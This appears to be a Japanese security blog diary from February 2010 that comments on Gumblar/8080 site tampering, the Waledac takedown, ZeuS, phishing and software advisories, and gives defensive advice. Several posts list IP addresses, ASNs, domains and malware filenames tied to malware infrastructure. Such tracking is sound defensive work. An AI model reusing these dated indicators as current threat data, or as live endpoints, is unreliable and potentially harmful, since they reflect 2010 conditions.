UnderForge of Lack

8080系が恐ろしい勢いでIPを増やしています
とうとう、大西洋を渡ってアメリカのISPも汚染を開始しました。

何度も言うようですが、脆弱性をきちんを塞いでいれば恐れることはありません。

しかし、一旦感染してしまうと、どうにもなりません。一部のホームページで 「Security Tools を駆除してOK」のような誤った対策が掲示されているようですが、そんな生易しいものなら、ここまでパンデミック化していません。Security Tools は、表面に現出する一部に過ぎません。

不幸にして感染してしまった方は、今後のことも含め、疑心暗鬼にならないためにも、バックアップを取ってクリーンインストール（完全に安全と確認できるスナップショットまでリカバリー）を行い、適切な対処を取ってくださいますようお願い致します。

	count	ASN	登録	更新
80.248.208.205	270	AS35830	02/26 10:50:08	02/26 22:00:05
213.137.2.118	166	AS13122	02/26 16:40:07	02/26 22:00:05
62.176.153.45	166	AS8426	02/26 10:50:08	02/26 22:00:05
66.147.239.213	73	AS4323	02/26 21:40:08	02/26 22:00:05
69.60.10.2	73	AS26163	02/26 21:40:08	02/26 22:00:05
94.23.11.38	27214	AS16276	02/17 10:35:20	02/26 21:40:08
91.121.108.53	21266	AS16276	02/17 10:35:20	02/26 21:40:08
91.121.7.26	14883	AS16276	02/20 05:50:34	02/26 21:40:08
89.149.244.211	9742	AS28753	02/20 08:30:31	02/26 21:40:08
62.75.218.192	4111	AS8972	02/17 12:30:27	02/26 21:40:08
91.121.24.139	22496	AS16276	02/17 10:35:20	02/26 21:10:05
89.110.147.181	5170	AS24989	02/17 13:30:59	02/26 21:10:05
77.68.44.169	2243	AS15418	02/17 10:35:20	02/26 21:10:05
78.41.156.236	612	AS6908	02/18 20:00:43	02/26 21:10:05
87.106.247.193	373	AS8560	02/17 19:40:50	02/26 21:10:05
92.51.132.101	346	AS20773	02/20 14:50:38	02/26 20:40:05
91.121.1.99	321	AS16276	02/17 21:00:39	02/26 20:40:05
213.251.133.159	231	AS16276	02/17 18:00:50	02/26 20:00:06
217.13.215.186	68	AS12494	02/26 19:40:05	02/26 20:00:06
84.242.167.49	68	AS8672	02/26 19:40:05	02/26 20:00:06
86.58.190.93	599	AS16095	02/26 10:50:08	02/26 19:40:05
62.68.162.19	483	AS15467	02/26 12:10:05	02/26 19:40:05
78.137.161.186	201	AS31122	02/26 17:10:06	02/26 19:40:05
91.204.116.114	446	AS44976	02/24 23:30:07	02/26 19:10:05
87.118.90.76	160	AS31103	02/26 12:10:05	02/26 19:10:05
83.168.238.66	115	AS35041	02/26 16:00:05	02/26 16:30:08
85.14.202.210	520	AS13301	02/20 04:50:59	02/26 12:00:06
67.210.97.244	81	AS15244	02/26 11:40:05	02/26 12:00:06
89.200.168.88	81	AS41078	02/26 11:40:05	02/26 12:00:06
216.87.163.53	81	AS30217	02/26 11:40:05	02/26 12:00:06
213.160.24.49	74	AS20676	02/26 11:20:06	02/26 11:40:05
91.199.104.50	74	AS44418	02/26 11:20:06	02/26 11:40:05
212.146.105.75	93	AS5606	02/26 10:50:08	02/26 11:10:05
91.121.172.32	11262	AS16276	02/17 10:35:20	02/24 03:40:20
80.69.74.73	10835	AS20857	02/17 10:35:20	02/24 03:40:20
188.72.211.253	6765	AS28753	02/17 10:35:20	02/24 03:40:20
87.233.139.100	3286	AS15703	02/17 10:35:20	02/24 03:20:08
188.40.118.68	2036	AS24940	02/17 10:35:20	02/23 21:20:18
213.251.164.84	2036	AS16276	02/17 10:35:20	02/23 21:20:18
94.23.199.154	2036	AS16276	02/17 10:35:20	02/23 21:20:18
78.31.107.49	2036	AS24931	02/17 10:35:20	02/23 21:20:18
91.121.180.112	2034	AS16276	02/20 00:30:36	02/23 17:30:22
91.121.221.181	4114	AS16276	02/19 23:30:35	02/23 15:40:16
85.17.58.10	375	AS16265	02/20 06:50:47	02/22 14:01:22
78.46.46.3	51	AS24940	02/20 04:30:27	02/22 03:00:48
88.80.221.41	380	AS39023	02/18 06:40:49	02/22 00:30:56
91.204.116.79	76	AS44976	02/20 04:50:59	02/21 02:40:36
84.200.227.144	299	AS31400	02/17 12:30:27	02/20 23:30:33
91.121.78.185	144	AS16276	02/20 00:40:38	02/20 06:30:57
213.186.60.175	60	AS16276	02/20 00:30:36	02/20 05:20:33
95.168.170.89	50	AS28753	02/19 22:40:46	02/20 04:20:39
88.191.63.28	7	AS12322	02/20 04:50:59	---
91.121.74.84	5	AS16276	02/19 21:20:43	---
91.121.142.111	5	AS16276	02/19 21:20:43	---
82.192.88.35	5	AS16265	02/19 21:20:43	---
217.23.5.27	5	AS49981	02/19 21:20:43	---
91.121.93.220	5	AS16276	02/19 21:20:43	---

二・二六事件の日
脱出の日
パナマ運河開通記念日 1914年
咸臨丸の日
血液銀行開業記念日

----------
Operation b49 #
Cracking Down on Botnets
we have executed a major botnet takedown of Waledac, a large and well-known “spambot.”
*clap* *clap* *clap*
すばらしいっ！
トレードマークの Dr.Waledacもしばらくは出て来れないでしょう（笑）
Three days into the effort, Operation b49 has effectively shut down connections to the vast majority of Waledac-infected computers, and our goal is to make that disruption permanent. But the operation hasn’t cleaned the infected computers and is not a silver bullet for undoing all the damage we believe Waledac has caused. Although the zombies are now largely out of the bot-herders’ control, they are still infected with the original malware.
Botnetに「銀の弾丸（特効武器）」は無く、C&Cを失ったゾンビは今後も潜伏し続けることでしょう。このあたりの徹底的な掃討は各Cert、セキュリティ機関及びISPの連携が必要です。そして、それが無ければ Mega-Dのように再び復活してくることになるかもしれません。

Dismantling Waledac
Microsoft Ambushes Waledac Botnet, Shutters Whistleblower Site
正に「アンブッシュ」ですね。
いずれにせよ、Botnetに堕ちるようなPCを運用していることが問題であって、そういう環境を一日も早く払拭することが重要です。

続く？
----------
MS KILLED Whistleblower site, too? #
ところで、Cryptome.org と今回の一件の因果関係が良くわからないのですが・・・
Microsoft Takes Down Whistleblower Site, Read the Secret Doc Here

Microsoft's wiretap guide goes online, security site goes offline
Long-established privacy and cryptology website Cryptome.org was pulled offline on Wednesday after Microsoft launched a legal offensive over its publication of Redmond's guide to internet wiretapping.
Cryptome restored after Microsoft change of heart
Microsoft to Withdraw Copyright Complaint, Cryptome Coming Back Online
Network Solutions says it will announce the withdrawal of the DMCA copyright complaint by Microsoft and the return of Cryptome online later this morning.
DMCAの濫用ともとれる内容ですが、何だかよくわかりません。

----------
しくしく
MS の Complaint PDFを開こうとしたら固まるので時間取られました・・

----------
tDiary #
tDiary 付属のプラグイン tb-send.rb におけるクロスサイトスクリプティングの脆弱性
update: tDiaryの脆弱性に関する報告(2010-02-25)
問題が発現するブラウザに制約があり、現在のところ確認されているのはIE7を使って日記を更新する場合のみになります(これより古いブラウザでも発生する可能性がありますが、開発元では確認していません)。Firefox、Opera、Safariなどの主要なブラウザでは発生しておりません。
また、tDiary 2.2に特有の問題であり、tDiary 2.3では発生しません。さらに、tb-send.rbプラグイン(TrackBack送信プラグイン)が有効になっている場合のみに発生します。
すごいピンポイントなんですね。

tDiary Unspecified Cross-Site Scripting Vulnerability 2

----------
so-net articles #
サイト改ざん猛威：「8080」がコード変更、「Gumblar.x」も攻撃再開
大手サイトの改ざんがおおむね沈静化し、メディアでの露出度がめっきり減った「ガンブラー」だが、そんな表向きの情勢とは裏腹に、ネット上では相変わらずの改ざん/再改ざんが繰り広げられている。
サイト改ざん猛威：ウイルス感染を100％防げる「ソフトウェアの更新」を
これらは、ウイルス感染を防ぐための基本対策の一部に過ぎないのだが、たったこれだけで、現行のGumblar.x/8080のウイルス感染を100％防ぐことができる。これは、この数か月間変わらぬ内容なのだが、実施していない方が多いというのが実情のようだ。
サイト改ざん猛威：感染パソコンの修復は「OSの再インストール」が近道
ダウンロード機能やアップデート機能も持っているため、感染後もシステムをいじり放題。感染パソコンを感染前の状態に戻すのは、ほとんど絶望的と考えるのが賢明だ。
いつもいつも的確な記事をありがとうございます。

----------
SQL #
モンベルの報告書：
不正アクセスによる情報漏えいの内容
不正アクセスの日時・攻撃手法
日時：2010年1月25日午前3時39分～1月26日午前6時37分にかけて断続的に
攻撃元：海外（中国のIPアドレス）
攻撃手法：弊社ウェブサーバー内のデータベースに対する「SQLインジェクション」（コンピュータ言語を悪用し、データベースを不正に操作する攻撃方法）。
※ガンブラー・ウイルスによる攻撃ではありません。
SQLインジェクションなら、使用していたCMSも公開して欲しいなぁ・・オリジナルだったらショウガナイですが。

参考：
Anatomy of a SQL Injection Attack

----------
Picasa #
Google Picasa JPEG Processing Integer Overflow Vulnerability 3

Update to version 3.6 build 105.41.

----------
IBM Tokyo SOC #
ZeuSの国内レポートは貴重ですね
東京SOCでのZeus/Zbot検知状況【Tokyo SOC Report】
これは、1～3 のウィルス・ファイルのダウンロードがクライアントPCにて発生した件数をカウントしています。
毎月5件程度のダウンロードが確認されています。昨年、感染を拡大したGumblar.X攻撃によるウィルス・ダウンロードと比べると検知件数が大幅に少ないことが分かります (Gumblar.X攻撃によるウィルス・ダウンロードは、2009年10月には約2千件確認されていました(*2))。様々なベンダーから、 Zeus/Zbotに関連する不審なメールが出回っているという情報が日々公開されていますが、実際の被害に遭う事例は少ないようです。
グラフの縦軸が １桁なのに注目！

国内の ZeuS の感染事例は確かに少ないようですね。

----------
Skypeのspam #
skypeに届くspam
確かに最近多いですね・・

----------
RSA conference #
RSA 2010: Top 15 Conference Sessions You Shouldn't Miss

Conference Stuff

----------
(笑) #
Teaching Some Security. Asking for help!
最高！
日本語版も作ってあげてください。

----------
pass-the-hash攻撃 #
Pass The Hash
良く知らなかったのですが、暗号化（Hash'ed）された文字列そのものを盗んで、正規パスワードを知ることなくアクセスできるという攻撃手法です。

詳細：
Pass-the-hash attacks: Tools and Mitigation

----------
Twitter釣り続行中 #
「This you????」　TwitterのフィッシングDM、日本でも出回る

This you?? What's the point of phishing a Twitter account?

----------
Password #
「パスワードの使い回しを防ぐ方法教えます」――米セキュリティ企業
パスワード使い回しの危険を避ける便利な方法――Websenseが紹介

元：
Top Secrets About Your Passwords

もういっそ覚えられないパスワードにして、マスターパスワード設定できるアプリ（きちんとマスターパスワードとの合成暗号化を行っていることが必須条件ですが）に記憶させ、パスワード自体はtxtにメモって自分で暗号化かけてFD（笑）にでも保管しておくとか・・・いろいろ考えるのですがなかなかうまくいきませんね。

----------
8080 #

	count	ASN	登録	更新
94.23.11.38	25651	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.24.139	21513	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.108.53	20140	AS16276	02/17 10:35:20	02/26 08:50:05
91.121.7.26	13879	AS16276	02/20 05:50:34	02/26 08:50:05
89.149.244.211	8656	AS28753	02/20 08:30:31	02/26 08:50:05
89.110.147.181	4545	AS24989	02/17 13:30:59	02/26 08:30:05
62.75.218.192	3069	AS8972	02/17 12:30:27	02/26 05:30:05
85.14.202.210	346	AS13301	02/20 04:50:59	02/25 05:30:05
91.204.116.114	81	AS44976	02/24 23:30:07	02/25 04:50:05
78.41.156.236	444	AS6908	02/18 20:00:43	02/25 03:40:08
92.51.132.101	63	AS20773	02/20 14:50:38	02/24 04:40:18
91.121.172.32	11262	AS16276	02/17 10:35:20	02/24 03:40:20
80.69.74.73	10835	AS20857	02/17 10:35:20	02/24 03:40:20
188.72.211.253	6765	AS28753	02/17 10:35:20	02/24 03:40:20
87.233.139.100	3286	AS15703	02/17 10:35:20	02/24 03:20:08
77.68.44.169	2036	AS15418	02/17 10:35:20	02/23 21:20:18
213.251.164.84	2036	AS16276	02/17 10:35:20	02/23 21:20:18
78.31.107.49	2036	AS24931	02/17 10:35:20	02/23 21:20:18
188.40.118.68	2036	AS24940	02/17 10:35:20	02/23 21:20:18
94.23.199.154	2036	AS16276	02/17 10:35:20	02/23 21:20:18
91.121.180.112	2034	AS16276	02/20 00:30:36	02/23 17:30:22
91.121.221.181	4114	AS16276	02/19 23:30:35	02/23 15:40:16
85.17.58.10	375	AS16265	02/20 06:50:47	02/22 14:01:22
78.46.46.3	51	AS24940	02/20 04:30:27	02/22 03:00:48
88.80.221.41	380	AS39023	02/18 06:40:49	02/22 00:30:56
91.204.116.79	76	AS44976	02/20 04:50:59	02/21 02:40:36
84.200.227.144	299	AS31400	02/17 12:30:27	02/20 23:30:33
87.106.247.193	55	AS8560	02/17 19:40:50	02/20 23:30:33
91.121.78.185	144	AS16276	02/20 00:40:38	02/20 06:30:57
213.186.60.175	60	AS16276	02/20 00:30:36	02/20 05:20:33
95.168.170.89	50	AS28753	02/19 22:40:46	02/20 04:20:39
91.121.1.99	101	AS16276	02/17 21:00:39	02/19 08:20:32
213.251.133.159	76	AS16276	02/17 18:00:50	02/19 06:20:46
88.191.63.28	7	AS12322	02/20 04:50:59	---
82.192.88.35	5	AS16265	02/19 21:20:43	---
91.121.74.84	5	AS16276	02/19 21:20:43	---
91.121.93.220	5	AS16276	02/19 21:20:43	---
91.121.142.111	5	AS16276	02/19 21:20:43	---
217.23.5.27	5	AS49981	02/19 21:20:43	---

----------
Google Safe Browsing #
| 1267128034 | B | [goog-black-hash 1.51835 update]
| 1267128002 | M | [goog-malware-hash 1.19636 update]
| 305324 | -1981(307305) 漸減中
| 1410089 |
EoF

南国忌
クロスカントリーの日
鉄道ストの日
月光仮面登場の日 (1958年)
昭和天皇の大喪の礼 (1989年)
湾岸戦争勃発 (1991年)

----------
JRE again #
（お詫び）ホームページの一部機能の利用停止について
現在、当社ホームページのキーワード検索機能の利用を停止しております。
なお、その他の機能については通常どおりご利用になれます。

　下記の期間にURL（hXXp://www.jreast-search.jp/）を直接入力したお客さまのみウィルス感染の可能性がございます。
　期間：2010年2月18日（木）22時29分～2010年2月22日（月）17時18分
ＪＲ東日本サイトが再びガンブラー被害
１２月末に起きた改ざん事件で、ＪＲ東日本は「感染源となったパソコンは特定し、対策を進めている」とコメントしていた。筆者の推定にはなるが、クリーンインストールをしなかったか、もしくはデータコピー時に別のパソコンに感染したのかもしれない。
　以前と同じページが、同じ攻撃手法で改ざんされてしまったのだから、ＪＲ東日本、あるいはサイト制作会社の対応がまずかったことは間違いない。
えーっと、なんでしたっけ？・・
これだっ BGM

何度も言うようですが、Noooo_spam様の６つの対策を行っていれば（現時点では感染はしません）
もっとも、昨年の12月初旬から今年1月前半まで、Adobe Reader 9.3のゼロデイが存在したわけですが、これも「Acrobat JavaScript」が斬られていれば動作する性質のものではありませんでした。

もし不幸にも感染してしまった（インジェクションが発生した）場合の始末ですが、結構大変です。
1. 感染の恐れがあるPCの全洗浄
　特にVMやBootCamp、Note型など、普段起動していないような環境を入念にチェック。
2. 社員全員に「FTPアクセスを自宅、もしくはその他の場所」で行ったことが無いかブリーフィング
　使ったことのあるPCの洗浄と、環境ファイル・レジストリの消去も必要です。
3. 全Credential の変更
　FTPにとどまらず、POP/IMAP/MySQLなどのアカウント情報変更
　(※) 特に phpmyadminを導入しているところは、バージョンの調査が必須。

その後、コンプライアンス（？）的に以下の作業が必要になるでしょう
a. セキュリティ・ポリシーの見直し
b. OS/Browser/Application の見直し
c. FTP/POP/IMAP/telnetなど、平文でパケットを飛ばしているプロトコルを徹底排除
d. サーバの対応状況の確認、あるいは設定変更あるいは ISP変更

これも繰り返しになりますが、
きちんと rssh の設定が可能なところは、SFTP(SSH2, TCP/22以外) + パスフレーズ入り秘密鍵認証で。
989/990を開けられるところは、Implicit FTPS による転送を
FTPSしか対応できないところは、FTP(E)S+PASV で
FTPしかできないでござる～　というところは VPN経由でどうぞ（苦笑）

続く
----------
Passwordの使いまわし #
さて、ここまで事態が悪化すると、本当にFTPだけの問題なのか？と疑問になっている方も多いかもしれません。

実際問題として、パスワードの使い回しをしている方は多く、特に MySQL の ID/Pass が SSH のCredential と同じのところを何度も見かけました（マテマテマテ）。
マスターパスワードが使用可能な SFTP/FTPS クライアントを使用し、保管パスワードがきちんと cipher'ed されているか確認することが重要な時代になってきているのかもしれません。
Use master password to encrypt passwords in stored sessions

(こないだどこかでやった)確認事項：

マスターパスワードをセットすべきクライアント：
Firefox
Opera
Thunderbird
WinSCP

SSL通信を行っているか確認すべきプロトコル
FTP TCP/21+PASV, or TCP/989-990
SMTP (SMTP over SSLRFC3207 TCP/465)
POP3 (POP3 over SSLRFC2595 TCP/995)
IMAP (POP3 over SSLRFC2595 TCP/993) or (Secure IMAP TCP/585)

あと・・非常に重要なことですが、あまりヒネったマスターパスワードを設定すると、あとで取り返しの付かない事態になりますので、お気をつけください（該当者２名有）


※セキュリティ対策って、その時々は「必死で」やるんですが、喉元過ぎるとすぐ忘れてしまうんですよね～　継続的なセキュリティ対策を対処し「続ける」ことが重要で・・ってみなさんわかってらっしゃいますよね？（笑）


----------
Firefox "UNKNOWN" vulnerability #
Secunia Advisory SA38608
Mozilla is aware of the claim of a zero-day in Firefox as posted here: http://secunia.com/advisories/38608/. We cannot confirm the report as we have received no details regarding the reported vulnerability, such as a proof-of-concept or steps to reproduce. We’ve attempted to contact the researcher who discovered the issue but have not received a response.
リサーチャ（？）と連絡を試みたけど反応無しっと・・

こっちでは「購買者」には反応しているようですが？
VulnDisco 9.0
I've bought VulnDisco 9.0 and tested the FireFox 0-day-exploit. It did NOT (!!!) work with FireFox 3.6 and 3.5.8 at WindowsXP SP3 and at WindowsVista SP2.
Honestly I think that exploit is just a hoax, an good advertisment trick - Secunia () believed it without testing it by themselves
If you do have Vulndisco and Canvas license, I would suggest you to contact us via email admin@vulndisco.net. and describe in more details how you've tested firefox exploit.
というわけで、こそこそと進行しているようですが、詳細は不明のまま・・・

だいたい、Immunityって、MySQLの怪しげなリモートコード実行の追加情報も出てこないので、今後は FUD ステッカーを５枚くらい貼ってから読むことにしますか・・・

----------
Intelも！ #
Operation Auroraも、話が大きすぎるのと政治色が強まってきて何が何だかまったく・・
‘Sophisticated’ Hack Hit Intel in January
Intel hit by 'sophisticated' hack last month
というわけで、IntelもGoogleやAdobe同様ハッキングをうけていたと公表しました。
具体的に何をされたのかは不明ですが・・・

グーグル攻撃に使われたコード、作成した中国のセキュリティ専門家を特定か--英報道
Chinese programmer fingered in Google attacks

はっきりしていることは、この攻撃コードが他のDbD攻撃に転用されているような様子は（現時点では）ありません。

----------
つこーた US版 #
FTC finds P2P networks rife with leaked identity data
The Federal Trade Commission today finally voiced concern about the long-known problem of data leaking into criminal hands via LimeWire, BearShare, Kazaa and dozens of other peer-to-peer (P2P) file sharing networks.
マテ・・

こういうのにはあまり国境はないのでしょうね・・たぶん

Widespread Data Breaches Uncovered by FTC Probe

----------
Adobe はアップデートでも脆弱性誘導 #
20日の話の続き
Security update available for Adobe Download Manager
なんかいろいろ手順が書かれていますが、
コントロールパネルの「プログラムと機能」から Adobe Download Manager を削除する
Firefoxの場合、
Adobe DLM(powered by getPlus(R))
も抹消してください。

Adobeのプロダクツは、どこまでも疑ってかからないとダメなんでしょうか？
Now's the time to ask
誰か突撃してみてくれませんか？（笑）

アドビ製品とFirefoxに未修整の脆弱性～コード実行のおそれ
Adobe Download Managerに脆弱性の情報、Adobeが調査を表明

----------
ByE6 #
BYE-IE-6
YouTube、IE6などのサポートを2010年3月に終了
さような～・・・

Nearly 20% still running IE 6
19% of respondents in a Virus Bulletin poll said that they are still running the browser, whether at home, at work, or both.
1/5 ですか？・・・

昨日紹介した BLADE: Hacking Away at Drive-By Downloads でも、MS-IE6への攻撃が他よりも飛びぬけて多いことが実証されています。

微妙に続く
----------
スロットマシーンの検証 #
ヨーロッパでは、反トラスト法の関係で、Windows7をインストールするとブラウザ選択の画面がでるのですが・・

ヨーロッパ人のためのランダムなブラウザ選択画面–その‘ランダム性’を検証してみた
スロバキアのテクニュースサイトDSL.skのマジメな人たちが、まさにこの疑問に答えるべく、ページの現在の実装とwww.browserchoice.euにあるコードを調べた。そしてその結果、リストの並び順は期待したほどランダムではないことを発見した。といっても、Microsoftが自社製品をえこひいきしているわけではなく、むしろ、 GoogleのChromeブラウザがやや有利、という調査結果になった。
(笑)

----------
時間切れ：

----------
炉 #
lots of fraud, scam, moneymule domains to blacklist
Mostly money-mule, fraud, scam domains added. Also some fast-flux and other malicious domains as well,.

----------
Another ZeuS #
Kneber: Another day at the office
In fact, there are many active botnets that are spawned by this widely distributed kit. It has become so popular, and accessible, that attacks like this are bound to arise in the numbers: Kneber is merely one of them.
ZeuS系もいろいろあるようですね・・
IT Firm Loses $100,000 to Online Bank Fraud
こういう特定銀行を狙ったスピア型にも ZeuS ツールが使われるケースもあるようです。

----------
その他 #
次々と手口を変え感染拡大を続ける偽セキュリティ・ソフト

電車内で“大声”で「通話」「会話」、迷惑だと感じている利用者はともに9割超え
そりゃ当り前でしょう・・問題はそれを注意できるかどうかであって・・

New Brazilian Banking Trojans Alert
VTをこういう使い方するときはハッシュかURLを提示してください（笑）

インターネット犯罪から身を守るために必要なのは「堅実で情報に敏感な奈良県民」の県民性
こめんとできない・・

オペラ、デバッグツール「Dragonfly」をオープンソースプロジェクトに移行
まだ使ってないのは内緒・・・ orz

Rogueware competing with Microsoft
To be honest, we’re fed up with seeing these programs everyday, because it’s always the same stuff, the same interfaces, the same icons, the same behaviour…and just another name.
うはは・・セキュ会社のひとでもウンザリするんですね

燃料電池革命？　Google、eBay等がテスト中のBloom Energyがいよいよお披露目へ
あ～、そういうことですか
Bloom Box Black SEO

----------
8080 #
DeListed --
worldmusicmagazine.ru
sugaryhome.ru
greatwebradio.ru
--

	count	ASN	登録	更新
94.23.11.38	17310	AS16276	02/17 10:35:20	02/24 08:40:42
91.121.24.139	14631	AS16276	02/17 10:35:20	02/24 08:40:42
91.121.108.53	11461	AS16276	02/17 10:35:20	02/24 08:40:42
91.121.7.26	5626	AS16276	02/20 05:50:34	02/24 08:40:42
62.75.218.192	979	AS8972	02/17 12:30:27	02/24 08:40:42
89.149.244.211	1771	AS28753	02/20 08:30:31	02/24 08:30:37
89.110.147.181	1135	AS24989	02/17 13:30:59	02/24 08:30:37
92.51.132.101	63	AS20773	02/20 14:50:38	02/24 04:40:18
91.121.172.32	11262	AS16276	02/17 10:35:20	02/24 03:40:20
80.69.74.73	10835	AS20857	02/17 10:35:20	02/24 03:40:20
188.72.211.253	6765	AS28753	02/17 10:35:20	02/24 03:40:20
87.233.139.100	3286	AS15703	02/17 10:35:20	02/24 03:20:08
213.251.164.84	2036	AS16276	02/17 10:35:20	02/23 21:20:18
188.40.118.68	2036	AS24940	02/17 10:35:20	02/23 21:20:18
94.23.199.154	2036	AS16276	02/17 10:35:20	02/23 21:20:18
78.31.107.49	2036	AS24931	02/17 10:35:20	02/23 21:20:18
77.68.44.169	2036	AS15418	02/17 10:35:20	02/23 21:20:18
91.121.180.112	2034	AS16276	02/20 00:30:36	02/23 17:30:22
91.121.221.181	4114	AS16276	02/19 23:30:35	02/23 15:40:16
85.17.58.10	375	AS16265	02/20 06:50:47	02/22 14:01:22
78.41.156.236	366	AS6908	02/18 20:00:43	02/22 05:30:51
85.14.202.210	250	AS13301	02/20 04:50:59	02/22 04:31:02
78.46.46.3	51	AS24940	02/20 04:30:27	02/22 03:00:48
88.80.221.41	380	AS39023	02/18 06:40:49	02/22 00:30:56
91.204.116.79	76	AS44976	02/20 04:50:59	02/21 02:40:36
84.200.227.144	299	AS31400	02/17 12:30:27	02/20 23:30:33
87.106.247.193	55	AS8560	02/17 19:40:50	02/20 23:30:33
91.121.78.185	144	AS16276	02/20 00:40:38	02/20 06:30:57
213.186.60.175	60	AS16276	02/20 00:30:36	02/20 05:20:33
95.168.170.89	50	AS28753	02/19 22:40:46	02/20 04:20:39
91.121.1.99	101	AS16276	02/17 21:00:39	02/19 08:20:32
213.251.133.159	76	AS16276	02/17 18:00:50	02/19 06:20:46
88.191.63.28	7	AS12322	02/20 04:50:59	---
91.121.74.84	5	AS16276	02/19 21:20:43	---
82.192.88.35	5	AS16265	02/19 21:20:43	---
91.121.142.111	5	AS16276	02/19 21:20:43	---
91.121.93.220	5	AS16276	02/19 21:20:43	---
217.23.5.27	5	AS49981	02/19 21:20:43	---

IPの追加が止まった感じでしょうか？
ひょっとしたら、リストに無いドメインで新しく「開拓」されているのかもしれませんが・・

----------
Google Safe Browsing #
| 1266955250 | B | [goog-black-hash 1.51691 update]
| 1266955203 | M | [goog-malware-hash 1.19589 update]
| 309104 | -2064(311168) 順調に漸減中
| 1402368 |
EoF

世界がんデー(World Cancer Day)
ぷよの日
銀閣寺の日
スリランカ
北宋の建国

----------
R.I.P. apache 1.3
またこんなことを書くと何か飛んできそうですが・・・
Apache HTTP Server 1.3.42 released (final release of 1.3.x)
The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 1.3.42 of the Apache HTTP Server ("Apache"). This release is intended as the final release of version 1.3 of the Apache HTTP Server, which has reached end of life status.
これまで長い間ありがとうございました。
そういえば、最初に触ったApacheのバージョンっていくつだったかなぁ・・？
Upgrade to to the current 2.2 version as soon as possible. For information about how to upgrade, please see the documentation:
http://httpd.apache.org/docs/2.2/upgrading.html
現行サーバを apache 1.x で運用している方は、Apache 2.2 への移行を視野にいれたほうがいいでしょう。
現行の最終 stable は 2.2.14

Apache mod_proxy "ap_proxy_send_fb()" Integer Truncation Vulnerability 4
Apache HTTP Server 1.3's final update released
R.I.P. Apache 1.x: Apache 1.3.42 marks of end life

----------
[980088]
Security Advisory 980088 Released
じきに日本語も出るでしょうが
address a publicly disclosed vulnerability in Internet Explorer that may allow Information Disclosure for customers running on Windows XP or who have disabled Internet Explorer Protected Mode. At this time we are not aware of any attacks seeking to use the vulnerability.
WindowsXP+IE6で保護モードを OFF にしている場合、情報流出の恐れがあるとのこと。
リモートからローカルのファイルを盗み見れるということかな？

Vulnerability in Internet Explorer Could Allow Information Disclosure
Our investigation so far has shown that if a user is using a version of Internet Explorer that is not running in Protected Mode an attacker may be able to access files with an already known filename and location.
やっぱし・・・
Afficted softwareが IE8とかあるのはキノセイでしょうか？

とりあえず、（IE使ってる人は）保護モードになっていることを確認して様子見ですね

微妙に続く
----------
Microsoftからのおてまみ
Microsoft Support informs you…
日本国内でも多数着弾しているようです。
9462.officexp-KB910721-FullFile-ENU.zip
officexp-KB910721-FullFile-ENU.exe

MSがこういう形で不特定多数ユーザにメールを送ることはありません（そのための Microsoft Updateですので）

微妙に続く
----------
でもTwitterは
やっちゃったんですよね～
Twitterがパスワード変更を促すメール、フィッシング詐欺で流出か
今後のセキュリティ・フィッシング対策として、一石を投げかける事態だと思うんですが、一般的にはあまり騒がれていません。

というか、こんな原因だったとは・・
Twitter攻撃の原因は Torrentサイトの裏口だった
Twitterが調べたところ、ここ数年来何者かがTorrentサイトを作り、Torrentサービス始めようとする人相手にサイトを売っていたことがわかった。問題は、この人物がサイトに裏口を仕掛けておき、そこが人気サイトになった時に侵入できるようにしていたらしいことだ。多くの人たちがウェブ上で同じIDとパスワードを使い回しているために、このデータによって大量のTwitterアカウントが漏えいした。
・・・・・・・・

Reason #4132 for Changing Your Password

----------
週間脆弱性 2010.02.01
チェックしておきたいぜい弱性情報＜2010.02.01＞ BGM
Firefox 3.6は自動ではupdateされませんので注意しましょう。
Firefox 3.0系のライフタイムは、2010 年 2 月で切れます。

----------
ガンブラーはFTPの夢を見るか
というより、FTP(RFC959)というプロトコルそのものを破滅に追い込もうとしていますが・・・
コンピュータウイルス・不正アクセスの届出状況[1月分]について
1. 今月の呼びかけ
「 "ガンブラー" の手口を知り、対策を行いましょう 」
英語の長文読むよりも疲れる・・・・

で、puppet様のとこ行ってコーヒー吹きました。
いろいろ
確かに、この位置関係だと加害者ですね（笑）

個人的に、gumblar/Gumblar.x/8080 の一番の恐ろしいところは、攻撃者が勤勉すぎる点だと思っています。アクセス先、インジェクション先、送付先、ホスティング、スクリプトをコロコロ手を変え品を変え攻撃してくるので、対処側が追いついてないのです。かといって、検出ルーチンを強化すると、ぷよってしまうので、セキュ会社も頭が痛いでしょうね。

ちなみに、FTPのパケットモニタリングは gumblar/Gumblar.xにもあった機能ですが、FTPの環境保存ファイルやレジストリからの直接奪取は 8080/QuickSilverの機能であり、Gumblar.Xにも確認されていません。
「FFFTP」をやめてもガンブラーウイルス対策にはならない -- 無題なブログ
このような点から見ても、そろそろ区分をきちんとしないと危険な側面がでてきそうですけど、
ま、

nobody cares .. こまけーことはいいんだよ

という精神でいきましょうかね

参照：
サイト改ざんでウイルス感染を広げる「ガンブラー」対策を～IPAが呼びかけIPAは、「ガンブラー」という言葉を、「Webサイト改ざん」と「Webサイトを閲覧するだけで感染させられてしまうウイルス」を組み合わせ、パソコンにウイルスを感染させようとする一連の手口（攻撃手法）を指すものと定義。その手口を詳しく解説している。
なんとなく、「」が多いあたりに皮肉を感じてしまうのは穿ち過ぎなんでしょうね。
NRIセキュア、「Gumblar」の感染発見に有効なマルウェア検知サービスを提供開始
同サービス」の提供価格は、監視サーバ1台あたり月額36万8000円（税別）。
フォーティネットウイルス対処状況レポート (2010年1月度)
1月のウイルス状況、トップの「Gumblar」に加え「Aurora」も猛威－フォーティネット調べ
ウイルスの活動量によるトップ10では、1位にウェブ改ざんで話題となっている「Gumblar.Botnet」がランクイン。全体の攻撃割合は 31.3％に達した。同レポートによれば、Gumblarは1月6日以降を境に、一気に活動を広げていた。

----------
偽Firefoxアップデートには・・・
Fake Firefox site bundles undead adware
Fake Firefox Update Pages Push Adware
Victims of this scam install the “Hotbar” toolbar by Pinball Corp, formerly Zango.
おまえかっ（笑）

----------
WoWもトークン導入に
Blizzard warns of account theft in World of Warcraft
FFXIには既に導入されているワンタイム･パスワード発行のセキュリティ・トークンですが、世界最大規模で、フィッシングも最大規模な WoWにも導入されるようです。

そして、何個もじゃらじゃ・・

----------
シグネチャ･不正コピー
クラウド上で“カジュアル・コピー”が横行？
スルーカ権行使！

Killing Antivirus, One DLL At A Time

----------
Pushdo Rampages
Pushdo SSL DDoS Attacks
まだ続いている様子

----------
ZeuSも元気いっぱい
Minipost: Fake Photo Zeus -- GarWarner
PhotoArchive.exe7/40 (17.50%)

